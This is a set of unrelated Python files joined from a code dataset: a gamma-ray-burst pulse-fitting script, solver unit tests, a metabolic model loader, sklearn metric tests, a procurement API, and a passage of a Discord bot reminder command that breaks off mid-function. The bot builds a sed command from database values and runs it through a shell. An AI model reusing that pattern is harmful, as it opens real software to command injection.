from PyGRB.main.fitpulse import PulseFitter
from PyGRB.backend.makemodels import create_model_from_key
from PyGRB.backend.makemodels import make_two_pulse_models
def run_log_flat_priors( indices,
model_keys,
channels,
nSamples,
n_per_split,
test
):
directory_labels = [ 'small_box_log_flat_nr',
'mid_box_log_flat_nr',
'large_box_log_flat_nr']
prior_sets = [{ 'priors_gamma_min': 1e-1, ## generic
'priors_gamma_max': 1e1,
'priors_nu_min' : 1e-1,
'priors_nu_max' : 1e1},
{ 'priors_gamma_min': 1e-2,
'priors_gamma_max': 1e2,
'priors_nu_min' : 1e-2,
'priors_nu_max' : 1e2},
{ 'priors_gamma_min': 1e-3,
'priors_gamma_max': 1e3,
'priors_nu_min' : 1e-3,
'priors_nu_max' : 1e3 }]
for ii, prior_set in enumerate(prior_sets):
if not test:
GRB_wrap = PulseFitter(3770, times = (-.1, 1),
datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
priors_pulse_start = -.1, priors_pulse_end = 0.6,
priors_td_lo = 0, priors_td_hi = 0.5,
directory_label = directory_labels[ii],
**prior_set)
GRB_wrap.offsets = [0, 4000, 8000, -3000]
else:
print('Currently running log-flat priors')
model_dict = {}
for key in model_keys:
model_dict[key] = create_model_from_key(key,
custom_name = f'{key}_{directory_labels[ii]}')
models = [model for key, model in model_dict.items()]
indx = np.intersect1d(indices,
np.arange(n_per_split * ii, n_per_split * (ii + 1))) % n_per_split
## given 2 models and 4 channels should be passed indx in [0-7]
if not test:
GRB_wrap._split_array_job_to_4_channels(models = models,
indices = indx,
channels = channels)
else:
print(indx)
def run_flat_priors( indices,
model_keys,
channels,
nSamples,
n_per_split,
test
):
directory_labels = [ 'small_box_flat_nr',
'mid_box_flat_nr',
'large_box_flat_nr']
prior_sets = [{ 'priors_gamma_min': 1e-1, ## generic
'priors_gamma_max': 1e1,
'priors_nu_min' : 1e-1,
'priors_nu_max' : 1e1},
{ 'priors_gamma_min': 1e-2,
'priors_gamma_max': 1e2,
'priors_nu_min' : 1e-2,
'priors_nu_max' : 1e2},
{ 'priors_gamma_min': 1e-3,
'priors_gamma_max': 1e3,
'priors_nu_min' : 1e-3,
'priors_nu_max' : 1e3 }]
for ii, prior_set in enumerate(prior_sets):
if not test:
GRB_wrap = PulseFitter(3770, times = (-.1, 1),
datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
priors_pulse_start = -.1, priors_pulse_end = 0.6,
priors_td_lo = 0, priors_td_hi = 0.5,
directory_label = directory_labels[ii])
GRB_wrap.offsets = [0, 4000, 8000, -3000]
else:
print('Currently running flat priors')
model_dict = {}
for key in model_keys:
model_dict[key] = create_model_from_key(key,
custom_name = f'{key}_{directory_labels[ii]}')
models = [model for key, model in model_dict.items()]
for mm, model in enumerate(models):
if not test:
GRB_wrap._setup_labels(model)
overwrite_priors = dict()
for n in range(1, GRB_wrap.num_pulses + 1):
for k in ['a', 'b', 'c', 'd']:
overwrite_priors[f'gamma_{n}_{k}'] = bilbyUniform(
minimum=prior_set['priors_gamma_min'],
maximum=prior_set['priors_gamma_max'],
latex_label=f'$\\gamma_{n} {k}$', unit=' ')
overwrite_priors[f'nu_{n}_{k}'] = bilbyUniform(
minimum=prior_set['priors_nu_min'],
maximum=prior_set['priors_nu_max'],
latex_label=f'$\\nu_{n} {k}$', unit=' ')
GRB_wrap.overwrite_priors = overwrite_priors
loop_idx = np.arange(8 * ii + 4 * mm, 8 * ii + 4 * (mm + 1))
if test:
print(indices)
print(ii, mm)
print('loop_idx = ', loop_idx)
indx = np.intersect1d(indices, loop_idx) % 4
if not test:
GRB_wrap._split_array_job_to_4_channels(models = [model],
indices = indx, channels = channels)
else:
print('index passed = ', indx)
def run_delta_priors( indices,
model_keys,
channels,
nSamples,
n_per_split,
test
):
directory_label = 'delta_nr'
if not test:
GRB_wrap = PulseFitter(3770, times = (-.1, 1),
datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
priors_pulse_start = -.1, priors_pulse_end = 0.6,
priors_td_lo = 0, priors_td_hi = 0.5,
directory_label = directory_label)
GRB_wrap.offsets = [0, 4000, 8000, -3000]
else:
print('Currently running delta function priors')
model_dict = {}
for key in model_keys:
model_dict[key] = create_model_from_key(key,
custom_name = f'{key}_{directory_label}')
models = [model for key, model in model_dict.items()]
for mm, model in enumerate(models):
if not test:
GRB_wrap._setup_labels(model)
overwrite_priors = dict()
for n in range(1, GRB_wrap.num_pulses + 1):
for k in ['a', 'b', 'c', 'd']:
overwrite_priors[f'gamma_{n}_{k}'] = bilbyDeltaFunction(
1, latex_label = f'$\\gamma$ {n} {k}')
overwrite_priors[f'nu_{n}_{k}'] = bilbyDeltaFunction(
1, latex_label = f'$\\nu$ {n} {k}')
GRB_wrap.overwrite_priors = overwrite_priors
loop_idx = np.arange(4 * mm, 4 * (mm + 1))
if test:
print(indices)
print(mm)
print('loop_idx = ', loop_idx)
indx = np.intersect1d(indices, loop_idx) % 4
if not test:
GRB_wrap._split_array_job_to_4_channels(models = [model],
indices = indx, channels = channels)
else:
print('index passed = ', indx)
def run_gaussian_priors( indices,
model_keys,
channels,
nSamples,
n_per_split,
test
):
directory_label = 'gaussian_nr'
if not test:
GRB_wrap = PulseFitter(3770, times = (-.1, 1),
datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
priors_pulse_start = -.1, priors_pulse_end = 0.6,
priors_td_lo = 0, priors_td_hi = 0.5,
directory_label = directory_label)
GRB_wrap.offsets = [0, 4000, 8000, -3000]
else:
print('Currently running Gaussian priors')
model_dict = {}
for key in model_keys:
model_dict[key] = create_model_from_key(key,
custom_name = f'{key}_{directory_label}')
models = [model for key, model in model_dict.items()]
for mm, model in enumerate(models):
if not test:
GRB_wrap._setup_labels(model)
overwrite_priors = dict()
for n in range(1, GRB_wrap.num_pulses + 1):
overwrite_priors[f'gamma_{n}_a'] = bilbyGaussian(
mu = 0.7, sigma = 2.5, latex_label = f'$\\gamma$ {n} a')
overwrite_priors[f'gamma_{n}_b'] = bilbyGaussian(
mu = 0.3, sigma = 0.4, latex_label = f'$\\gamma$ {n} b')
overwrite_priors[f'gamma_{n}_c'] = bilbyGaussian(
mu = 0.38, sigma = 0.3, latex_label = f'$\\gamma$ {n} c')
overwrite_priors[f'gamma_{n}_d'] = bilbyGaussian(
mu = 0.5, sigma = 5, latex_label = f'$\\gamma$ {n} d')
overwrite_priors[f'nu_{n}_a'] = bilbyGaussian(
mu = 2, sigma = 2, latex_label = f'$\\nu$ {n} a')
overwrite_priors[f'nu_{n}_b'] = bilbyGaussian(
mu = 3.3, sigma = 1.2, latex_label = f'$\\nu$ {n} b')
overwrite_priors[f'nu_{n}_c'] = bilbyGaussian(
mu = 2.74, sigma = 0.8, latex_label = f'$\\nu$ {n} c')
overwrite_priors[f'nu_{n}_d'] = bilbyGaussian(
mu = 2.7, sigma = 5, latex_label = f'$\\nu$ {n} d')
GRB_wrap.overwrite_priors = overwrite_priors
loop_idx = np.arange(4 * mm, 4 * (mm + 1))
if test:
print(indices)
print(mm)
print('loop_idx = ', loop_idx)
indx = np.intersect1d(indices, loop_idx) % 4
if not test:
GRB_wrap._split_array_job_to_4_channels(models = [model],
indices = indx, channels = channels)
else:
print('index passed = ', indx)
def analysis_for_3770(indices, test):
if not test:
iddy = indices[0]
time.sleep(iddy * 100)
nSamples = 2000
model_keys = ['<KEY>']
channels = [0, 1, 2, 3]
n_per_split = len(model_keys) * len(channels)
current_idx = 0
end_idx = current_idx + n_per_split * 3 # 3 prior sets for this function
log_flat_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
if len(log_flat_indices) > 0:
print('Original indices passed to log-flat prior function: ', log_flat_indices)
run_log_flat_priors( log_flat_indices, model_keys, channels,
nSamples, n_per_split, test)
current_idx = end_idx
end_idx = current_idx + n_per_split * 3 # 3 prior sets for this function
flat_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
if len(flat_indices) > 0:
print('Original indices passed to flat prior function: ', flat_indices)
flat_indices -= current_idx # resets to 0-23 as per OG
run_flat_priors( flat_indices, model_keys, channels,
nSamples, n_per_split, test)
current_idx = end_idx
end_idx = current_idx + n_per_split * 1 # 1 prior set for this function
delta_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
if len(delta_indices) > 0:
print('Original indices passed to delta prior function: ', delta_indices)
delta_indices -= current_idx # resets to 0-8 as per OG
run_delta_priors( delta_indices, model_keys, channels,
nSamples, n_per_split, test)
current_idx = end_idx
end_idx = current_idx + n_per_split * 1 # 1 prior set for this function
gauss_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
if len(gauss_indices) > 0:
print('Original indices passed to Gaussian prior function: ', gauss_indices)
gauss_indices -= current_idx # resets to 0-8 as per OG
run_gaussian_priors(gauss_indices, model_keys, channels,
nSamples, n_per_split, test)
def evidence_for_3770():
nSamples = 2000
model_keys = ['XsL', 'XsXs']
channels = [0, 1, 2, 3]
directory_labels = [ 'small_box_log_flat_nr',
'mid_box_log_flat_nr',
'large_box_log_flat_nr',
'small_box_flat_nr',
'mid_box_flat_nr',
'large_box_flat_nr',
'delta_nr',
'gaussian_nr']
model_dict = {}
for key in model_keys:
for directory_label in directory_labels:
m_key = f'{key}_{directory_label}'
model_dict[m_key] = create_model_from_key(key,
custom_name = f'{key}_{directory_label}')
models = [model for key, model in model_dict.items()]
GRB = PulseFitter(3770, times = (-.1, 1),
datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
priors_pulse_start = -.1, priors_pulse_end = 0.6,
priors_td_lo = 0, priors_td_hi = 0.5)
GRB.offsets = [0, 4000, 8000, -3000]
for model in models:
GRB.get_residuals(channels = [0, 1, 2, 3], model = model)
GRB.lens_calc(channels = [0, 1, 2, 3], model = model)
GRB.get_evidence_from_models(model_dict)
if __name__ == '__main__':
parser = argparse.ArgumentParser( description = 'Core bilby wrapper')
parser.add_argument('--HPC', action = 'store_true',
help = 'Are you running this on SPARTAN ?')
parser.add_argument('-i', '--indices', type=int, nargs='+',
help='an integer for indexing geomspace array')
args = parser.parse_args()
HPC = args.HPC
if not HPC:
from matplotlib import rc
rc('font', **{'family': 'DejaVu Sans',
'serif': ['Computer Modern'],'size': 8})
rc('text', usetex=True)
rc('text.latex',
preamble=r'\usepackage{amsmath}\usepackage{amssymb}\usepackage{amsfonts}')
SAMPLER = 'nestle'
# run the later analysis on a local machine
evidence_for_3770()
else:
# run the nested sampling on a cluster
# the indices allow each model/channel to be run simultaneously on
# different machines. See the slurm scripts for examples
SAMPLER = 'dynesty'
analysis_for_3770(args.indices)
| StarcoderdataPython |
11215512 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# _________ _______ __
# / _/ ___// ____/ | / /
# / / \__ \/ __/ / |/ /
# _/ / ___/ / /___/ /| /
# /___//____/_____/_/ |_/
#
# Isentropic model - ETH Zürich
# Copyright (C) 2016 <NAME> (<EMAIL>)
#
# This file is distributed under the MIT Open Source License. See LICENSE.TXT for details.
#
from __future__ import print_function, division
import unittest
import os
import tempfile
import numpy as np
import IsenPython
ScriptPath = os.path.dirname(os.path.realpath(__file__))
# Possibly namelist files
files = [os.path.join(ScriptPath, "..", "data", "namelist.m"),
os.path.join(ScriptPath, "..", "test", "data", "namelist.m")]
files = filter(lambda f: os.path.exists(f) == True, files)
## Solver
class TestSolver(unittest.TestCase):
"""Test PySolver"""
def setUp(self):
self.solver = IsenPython.Solver()
def test_constructor(self):
"""Test constructor"""
namelist = IsenPython.NameList()
try:
solver = IsenPython.Solver("ref")
solver.init(namelist)
except RuntimeError as e:
self.fail("IsenException caught: {0}".format(e.message))
with self.assertRaises(RuntimeError):
solver = IsenPython.Solver("qwfawsdqwadqwf")
solver.init(namelist)
def test_init_namelist(self):
"""Test initalization with a namelist"""
namelist = IsenPython.NameList()
try:
self.solver.init(namelist)
except RuntimeError as e:
self.fail("IsenException caught: {0}".format(e.message))
@unittest.skipIf(len(files) == 0, "no namelist file available")
def test_init_file(self):
"""Test initalization with a file"""
try:
self.solver.init(files[0])
except RuntimeError as e:
self.fail("IsenException caught: \"{0}\"".format(e.message))
def test_get_field(self):
"""Test querying fields"""
namelist = IsenPython.NameList()
try:
self.solver.init(namelist)
u = self.solver.getField("unow")
self.assertTrue(np.shape(u) == (namelist.nx + 1 + 2*namelist.nb, namelist.nz))
except RuntimeError as e:
self.fail("IsenException caught: \"{0}\"".format(e.message))
with self.assertRaises(RuntimeError):
self.solver.getField("not-a-field")
def test_get_namelist(self):
"""Test querying namelist"""
namelist = IsenPython.NameList()
namelist.nz = 100
self.solver.init(namelist)
self.assertTrue(self.solver.getNameList().nz == namelist.nz)
def test_get_output(self):
"""Test querying output"""
namelist = IsenPython.NameList()
self.solver.init(namelist)
self.assertTrue(self.solver.getOutput().getNameList().nz == namelist.nz)
def test_write(self):
"""Test writing output files"""
namelist = IsenPython.NameList()
namelist.nx = 5
namelist.nz = 5
self.solver.init(namelist)
tfile = "__temporary_output_file__.txt"
try:
self.solver.write(IsenPython.ArchiveType.Text, tfile)
except RuntimeError as e:
self.fail("IsenException caught: \"{0}\"".format(e.message))
finally:
os.remove(tfile)
## Output
class TestOutput(unittest.TestCase):
"""Test PyOutput"""
def setUp(self):
self.namelist = IsenPython.NameList()
self.namelist.nx = 5
self.namelist.nz = 5
self.imoist = False
self.imicrophys = 0
self.idthdt = False
self.solver = IsenPython.Solver()
self.solver.init(self.namelist)
def test_init_from_solver(self):
"""Test querying fields"""
try:
output = self.solver.getOutput()
self.assertTrue(output.getNameList().nx == self.namelist.nx)
except RuntimeError as e:
self.fail("IsenException caught: \"{0}\"".format(e.message))
def test_get_field(self):
"""Test initalization from solver"""
try:
output = self.solver.getOutput()
z = output.z()
u = output.u()
s = output.s()
t = output.t()
except RuntimeError as e:
self.fail("IsenException caught: \"{0}\"".format(e.message))
with self.assertRaises(RuntimeError):
output = self.solver.getOutput()
output.prec()
def test_read_write(self):
"""Test serialization/deserialization"""
for archive in [IsenPython.ArchiveType.Text,
IsenPython.ArchiveType.Xml,
IsenPython.ArchiveType.Binary]:
tfile = "__temporary_output_file__"
try:
if archive == IsenPython.ArchiveType.Text:
tfile += ".txt"
elif archive == IsenPython.ArchiveType.Xml:
tfile += ".xml"
else:
tfile += ".bin"
self.solver.write(archive, tfile)
output = IsenPython.Output()
output.read(tfile)
except RuntimeError as e:
self.fail("IsenException caught: \"{0}\"".format(e.message))
finally:
os.remove(tfile)
## NameList
class TestNameList(unittest.TestCase):
"""Test PyNameList"""
def test_init_default(self):
"""Test default initalization"""
namelist = IsenPython.NameList()
self.assertIsNotNone(namelist)
@unittest.skipIf(len(files) == 0, "no namelist file available")
def test_init_file(self):
"""Test initalization with a file"""
try:
namelist = IsenPython.NameList(files[0])
except RuntimeError as e:
self.fail("IsenException caught: {0}".format(e.message))
with self.assertRaises(RuntimeError):
namelist = IsenPython.NameList("not-a-file")
def test_print(self):
"""Test printing"""
namelist = IsenPython.NameList()
self.assertIsNotNone(namelist.__str__())
def test_property(self):
"""Test properties"""
namelist = IsenPython.NameList()
self.assertTrue(hasattr(namelist, 'run_name'))
self.assertTrue(hasattr(namelist, 'iout'))
self.assertTrue(hasattr(namelist, 'iiniout'))
self.assertTrue(hasattr(namelist, 'xl'))
self.assertTrue(hasattr(namelist, 'nx'))
self.assertTrue(hasattr(namelist, 'thl'))
self.assertTrue(hasattr(namelist, 'nz'))
self.assertTrue(hasattr(namelist, 'time'))
self.assertTrue(hasattr(namelist, 'dt'))
self.assertTrue(hasattr(namelist, 'diff'))
self.assertTrue(hasattr(namelist, 'topomx'))
self.assertTrue(hasattr(namelist, 'topowd'))
self.assertTrue(hasattr(namelist, 'topotim'))
self.assertTrue(hasattr(namelist, 'u00'))
self.assertTrue(hasattr(namelist, 'bv00'))
self.assertTrue(hasattr(namelist, 'th00'))
self.assertTrue(hasattr(namelist, 'ishear'))
self.assertTrue(hasattr(namelist, 'k_shl'))
self.assertTrue(hasattr(namelist, 'k_sht'))
self.assertTrue(hasattr(namelist, 'u00_sh'))
self.assertTrue(hasattr(namelist, 'nab'))
self.assertTrue(hasattr(namelist, 'diffabs'))
self.assertTrue(hasattr(namelist, 'irelax'))
self.assertTrue(hasattr(namelist, 'nb'))
self.assertTrue(hasattr(namelist, 'iprtcfl'))
self.assertTrue(hasattr(namelist, 'itime'))
self.assertTrue(hasattr(namelist, 'imoist'))
self.assertTrue(hasattr(namelist, 'imoist_diff'))
self.assertTrue(hasattr(namelist, 'imicrophys'))
self.assertTrue(hasattr(namelist, 'idthdt'))
self.assertTrue(hasattr(namelist, 'iern'))
self.assertTrue(hasattr(namelist, 'vt_mult'))
self.assertTrue(hasattr(namelist, 'autoconv_th'))
self.assertTrue(hasattr(namelist, 'autoconv_mult'))
self.assertTrue(hasattr(namelist, 'sediment_on'))
if __name__ == "__main__":
IsenPython.Logger().disable()
unittest.main()
| StarcoderdataPython |
9658897 | <gh_stars>0
from __future__ import print_function, division, absolute_import
import os
import libsbml
from .MetabolicModel import MetabolicModel
from ..globals import MODEL_DIR
from . import importMATLAB
from . import importSBML2
from . import importSBML3
from .geneSymbols import resolve_genes, convert_species
from .importCommon import clean_reactions, limit_maximum_flux
# ----------------------------------------
# Loading models from either XML or MATLAB outputs
# ----------------------------------------
def load_metabolic_model(model_name, species='homo_sapiens'):
"""
Loads the metabolic model from `file_name`, returning a Model object
"""
if model_name.endswith('_mat'):
model = importMATLAB.load(model_name, species)
else:
model_dir = os.path.join(MODEL_DIR, model_name)
model_file = [x for x in os.listdir(model_dir) if
x.lower().endswith('.xml') or
x.lower().endswith('.xml.gz')]
if len(model_file) == 0:
raise Exception(
"Invalid model - could not find .xml or .xml.gz file in " +
model_dir)
else:
model_file = model_file[0]
full_path = os.path.join(model_dir, model_file)
sbmlDocument = libsbml.readSBMLFromFile(full_path)
level = sbmlDocument.getLevel()
if level == 3:
model = importSBML3.load(model_name, sbmlDocument)
elif level == 2:
model = importSBML2.load(model_name, sbmlDocument)
else:
raise Exception(
"Invalid level {} for model {}".format(
level, model_file)
)
resolve_genes(model)
convert_species(model, species)
clean_reactions(model)
limit_maximum_flux(model, 1000)
return model
def init_model(model, species, exchange_limit, media=None):
model = load_metabolic_model(model, species)
# Limit exchange reactions
model.limitExchangeReactions(limit=exchange_limit)
# Split fluxes into _pos / _neg
model.make_unidirectional()
if media is not None:
model.load_media(media)
return model
| StarcoderdataPython |
9650463 | """Testing for bicluster metrics module"""
import numpy as np
from sklearn.utils._testing import assert_almost_equal
from sklearn.metrics.cluster._bicluster import _jaccard
from sklearn.metrics import consensus_score
def test_jaccard():
a1 = np.array([True, True, False, False])
a2 = np.array([True, True, True, True])
a3 = np.array([False, True, True, False])
a4 = np.array([False, False, True, True])
assert _jaccard(a1, a1, a1, a1) == 1
assert _jaccard(a1, a1, a2, a2) == 0.25
assert _jaccard(a1, a1, a3, a3) == 1.0 / 7
assert _jaccard(a1, a1, a4, a4) == 0
def test_consensus_score():
a = [[True, True, False, False],
[False, False, True, True]]
b = a[::-1]
assert consensus_score((a, a), (a, a)) == 1
assert consensus_score((a, a), (b, b)) == 1
assert consensus_score((a, b), (a, b)) == 1
assert consensus_score((a, b), (b, a)) == 1
assert consensus_score((a, a), (b, a)) == 0
assert consensus_score((a, a), (a, b)) == 0
assert consensus_score((b, b), (a, b)) == 0
assert consensus_score((b, b), (b, a)) == 0
def test_consensus_score_issue2445():
''' Different number of biclusters in A and B'''
a_rows = np.array([[True, True, False, False],
[False, False, True, True],
[False, False, False, True]])
a_cols = np.array([[True, True, False, False],
[False, False, True, True],
[False, False, False, True]])
idx = [0, 2]
s = consensus_score((a_rows, a_cols), (a_rows[idx], a_cols[idx]))
# B contains 2 of the 3 biclusters in A, so score should be 2/3
assert_almost_equal(s, 2.0/3.0)
| StarcoderdataPython |
9671090 | <reponame>uk-gov-mirror/alphagov.digitalmarketplace-api<gh_stars>10-100
from datetime import datetime
from dmutils.formats import DATE_FORMAT
from flask import abort, request, current_app
from sqlalchemy.exc import IntegrityError, DataError
from dmapiclient.audit import AuditTypes
from dmutils.config import convert_to_boolean
from .. import main
from ...models import db, Brief, BriefResponse, AuditEvent, Framework
from ...utils import (
get_int_or_400,
get_json_from_request,
get_request_page_questions,
get_valid_page_or_1,
json_has_required_keys,
list_result_response,
paginated_result_response,
single_result_response,
validate_and_return_updater_request,
)
from ...brief_utils import get_supplier_service_eligible_for_brief
from ...service_utils import validate_and_return_supplier
COMPLETED_BRIEF_RESPONSE_STATUSES = ['submitted', 'pending-awarded', 'awarded']
RESOURCE_NAME = "briefResponses"
@main.route('/brief-responses', methods=['POST'])
def create_brief_response():
json_payload = get_json_from_request()
updater_json = validate_and_return_updater_request()
page_questions = get_request_page_questions()
json_has_required_keys(json_payload, ['briefResponses'])
brief_response_json = json_payload['briefResponses']
json_has_required_keys(brief_response_json, ['briefId', 'supplierId'])
try:
brief = Brief.query.get(brief_response_json['briefId'])
except DataError:
brief = None
if brief is None:
abort(400, "Invalid brief ID '{}'".format(brief_response_json['briefId']))
if brief.status != 'live':
abort(400, "Brief must be live")
if brief.framework.status not in ['live', 'expired']:
abort(400, "Brief framework must be live or expired")
supplier = validate_and_return_supplier(brief_response_json)
brief_service = get_supplier_service_eligible_for_brief(supplier, brief)
if not brief_service:
abort(400, "Supplier is not eligible to apply to this brief")
# Check if brief response already exists from this supplier
if BriefResponse.query.filter(BriefResponse.supplier == supplier, BriefResponse.brief == brief).first():
abort(400, "Brief response already exists for supplier '{}'".format(supplier.supplier_id))
brief_response = BriefResponse(
data=brief_response_json,
supplier=supplier,
brief=brief,
)
brief_role = brief.data["specialistRole"] if brief.lot.slug == "digital-specialists" else None
service_max_day_rate = brief_service.data[brief_role + "PriceMax"] if brief_role else None
brief_response.validate(enforce_required=False, required_fields=page_questions, max_day_rate=service_max_day_rate)
db.session.add(brief_response)
try:
db.session.flush()
except IntegrityError as e:
db.session.rollback()
abort(400, format(e))
audit = AuditEvent(
audit_type=AuditTypes.create_brief_response,
user=updater_json['updated_by'],
data={
'briefResponseId': brief_response.id,
'briefResponseJson': brief_response_json,
'supplierId': supplier.supplier_id,
},
db_object=brief_response,
)
db.session.add(audit)
db.session.commit()
return single_result_response(RESOURCE_NAME, brief_response), 201
@main.route('/brief-responses/<int:brief_response_id>', methods=['POST'])
def update_brief_response(brief_response_id):
json_payload = get_json_from_request()
updater_json = validate_and_return_updater_request()
page_questions = get_request_page_questions()
json_has_required_keys(json_payload, ['briefResponses'])
brief_response_json = json_payload['briefResponses']
brief_response = BriefResponse.query.filter(
BriefResponse.id == brief_response_id
).first_or_404()
brief = brief_response.brief
supplier = brief_response.supplier
brief_service = get_supplier_service_eligible_for_brief(supplier, brief)
if not brief_service:
abort(400, "Supplier is not eligible to apply to this brief")
if brief.status != 'live':
abort(400, "Brief must have 'live' status for the brief response to be updated")
if brief.framework.status not in ['live', 'expired']:
abort(400, "Brief framework must be live or expired")
brief_role = brief.data["specialistRole"] if brief.lot.slug == "digital-specialists" else None
service_max_day_rate = brief_service.data[brief_role + "PriceMax"] if brief_role else None
brief_response.update_from_json(brief_response_json)
brief_response.validate(enforce_required=False, required_fields=page_questions, max_day_rate=service_max_day_rate)
audit = AuditEvent(
audit_type=AuditTypes.update_brief_response,
user=updater_json['updated_by'],
data={
'briefResponseId': brief_response.id,
'briefResponseData': brief_response_json,
'supplierId': supplier.supplier_id,
},
db_object=brief_response,
)
db.session.add(brief_response)
db.session.add(audit)
try:
db.session.commit()
except IntegrityError as e:
db.session.rollback()
abort(400, format(e))
return single_result_response(RESOURCE_NAME, brief_response), 200
@main.route('/brief-responses/<int:brief_response_id>/submit', methods=['POST'])
def submit_brief_response(brief_response_id):
updater_json = validate_and_return_updater_request()
brief_response = BriefResponse.query.filter(
BriefResponse.id == brief_response_id
).first_or_404()
brief = brief_response.brief
supplier = brief_response.supplier
brief_service = get_supplier_service_eligible_for_brief(supplier, brief)
if not brief_service:
abort(400, "Supplier is not eligible to apply to this brief")
if brief.status != 'live':
abort(400, "Brief must have 'live' status for the brief response to be submitted")
if brief.framework.status not in ['live', 'expired']:
abort(400, "Brief framework must be live or expired")
brief_role = brief.data["specialistRole"] if brief.lot.slug == "digital-specialists" else None
service_max_day_rate = brief_service.data[brief_role + "PriceMax"] if brief_role else None
brief_response.validate(max_day_rate=service_max_day_rate)
brief_response.submitted_at = datetime.utcnow()
audit = AuditEvent(
audit_type=AuditTypes.submit_brief_response,
user=updater_json['updated_by'],
data={
'briefResponseId': brief_response.id,
'supplierId': supplier.supplier_id,
},
db_object=brief_response,
)
db.session.add(brief_response)
db.session.add(audit)
try:
db.session.commit()
except IntegrityError as e:
db.session.rollback()
abort(400, format(e))
return single_result_response(RESOURCE_NAME, brief_response), 200
@main.route('/brief-responses/<int:brief_response_id>', methods=['GET'])
def get_brief_response(brief_response_id):
brief_response = BriefResponse.query.filter(
BriefResponse.id == brief_response_id
).first_or_404()
return single_result_response(RESOURCE_NAME, brief_response), 200
@main.route('/brief-responses', methods=['GET'])
def list_brief_responses():
page = get_valid_page_or_1()
brief_id = get_int_or_400(request.args, 'brief_id')
supplier_id = get_int_or_400(request.args, 'supplier_id')
awarded_at = request.args.get('awarded_at')
with_data = convert_to_boolean(request.args.get("with-data", "true"))
if request.args.get('status'):
statuses = request.args['status'].split(',')
else:
statuses = COMPLETED_BRIEF_RESPONSE_STATUSES
brief_responses = BriefResponse.query.filter(BriefResponse.status.in_(statuses))
if supplier_id is not None:
brief_responses = brief_responses.filter(BriefResponse.supplier_id == supplier_id)
if brief_id is not None:
brief_responses = brief_responses.filter(BriefResponse.brief_id == brief_id)
if awarded_at is not None:
day_start = datetime.strptime(awarded_at, DATE_FORMAT)
day_end = datetime(day_start.year, day_start.month, day_start.day, 23, 59, 59, 999999)
# Inclusive date range filtering
brief_responses = brief_responses.filter(BriefResponse.awarded_at.between(day_start, day_end))
brief_responses = brief_responses.options(
db.defaultload(BriefResponse.brief).defaultload(Brief.framework).lazyload("*"),
db.defaultload(BriefResponse.brief).defaultload(Brief.lot).lazyload("*"),
db.defaultload(BriefResponse.brief).defaultload(Brief.awarded_brief_response).lazyload("*"),
db.defaultload(BriefResponse.supplier).lazyload("*"),
)
if request.args.get('framework'):
brief_responses = brief_responses.join(BriefResponse.brief).join(Brief.framework).filter(
Brief.framework.has(Framework.slug.in_(
framework_slug.strip() for framework_slug in request.args["framework"].split(",")
))
)
serialize_kwargs = {"with_data": with_data}
if brief_id or supplier_id:
return list_result_response(RESOURCE_NAME, brief_responses, serialize_kwargs=serialize_kwargs), 200
return paginated_result_response(
result_name=RESOURCE_NAME,
results_query=brief_responses,
serialize_kwargs=serialize_kwargs,
page=page,
per_page=current_app.config['DM_API_BRIEF_RESPONSES_PAGE_SIZE'],
endpoint='.list_brief_responses',
request_args=request.args
), 200
| StarcoderdataPython |
6704422 | <reponame>ev-ev/CS-Pound
import subprocess
import discord
from discord.ext import commands
from library import pound_countdown, mongodb_find
class AutoRemind:
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['ar'])
@commands.guild_only() # Command can only be run in guilds
async def autoremind(self, ctx, args=''):
id_exists = await mongodb_find({'_id': str(ctx.author.id)}) # Get document of user
try:
id_exists = id_exists[0]
except IndexError:
pass
print(f'DOCUMENT: {id_exists}')
guild_roles = ctx.guild.roles # List of roles in guild
embed = discord.Embed()
for role in guild_roles: # For each role in the guild
if role.name == "CS Pound": # If 'CS Pound' role exists
permission = role.permissions.manage_roles # Check whether role has 'Manage Roles' permission and set boolean value
break # Break out of for loop
else: # If role doesn't exist
permission = False
if permission: # If bot has permission to 'Manage Roles'
guild_roles = ctx.guild.roles # List of roles in guild
for role in guild_roles: # Checks if role already exists in guild
if role.name == "Auto Remind": # If role exists
break # Break out of for loop
else: # If role doesn't exist
await ctx.guild.create_role(name='Auto Remind', reason='Auto Remind didn\'t exist') # Create 'Auto Remind' role in guild
if args == 'off' or args == 'cancel': # If user wants to turn off Auto Remind
if id_exists == '': # If user doesn't exist in database
embed = discord.Embed(title='Auto Remind', description='You don\'t have Auto Remind setup {0.mention}!'.format(ctx.message.author), colour=0xff5252) # Create embed
else: # If user exists
sed_statement = 'sed -i.bak ' + id_exists + 'd autoremind.txt' # sed statement
subprocess.Popen(sed_statement, shell=True) # Run sed statement
if permission: # If bot has permission to 'Manage Roles'
await ctx.author.remove_roles(discord.utils.get(guild_roles, name='Auto Remind'), reason='User disabled Auto Remind.') # Remove role from user
embed = discord.Embed(title='Auto Remind', description='You have been removed from the Auto Remind role.', colour=0x4ba139) # Create embed
else: # If bot doesn't have permission to 'Manage Roles'
embed = discord.Embed(title='Auto Remind', description='You have been removed from the Auto Remind.', colour=0x4ba139) # Create embed
else: # If user is setting an Auto Remind
valid = False
if args == '': # If no arguments provided
embed = discord.Embed(title='Auto Remind', description='You didn\'t input a time!', colour=0xff5252) # Create embed
elif args.isdigit(): # If the input is a digit
valid = True
else: # If the input isn't a digit
args = args[:-1] # Remove the minute marker
if args.isdigit(): # If the input is a digit now
valid = True
else: # If input is still not digit
embed = discord.Embed(title='Auto Remind', description='That is not a valid time!', colour=0xff5252) # Create embed
if valid: # If inputted time was valid
if int(args) > 60: # If time is bigger than 60 minutes
embed = discord.Embed(title='Auto Remind', description='That time is too far!', colour=0xff5252) # Create embed
else: # If time is less than 60 minutes
if id_exists != '': # If user has already set an Auto Remind
embed = discord.Embed(title='Auto Remind', description='You already have Auto Remind setup!'.format(ctx.message.author), colour=0xff5252) # Create embed
else: # If user doesn't have an Auto Remind setup
text = f'{ctx.message.guild.id} {ctx.message.channel.id} {ctx.message.author.id} {args}' + '\n' # Write in the format 'GUILD_ID CHANNEL_ID USER_ID REMIND_TIME'
with open('autoremind.txt', 'a+') as file: # Open autoremind.txt
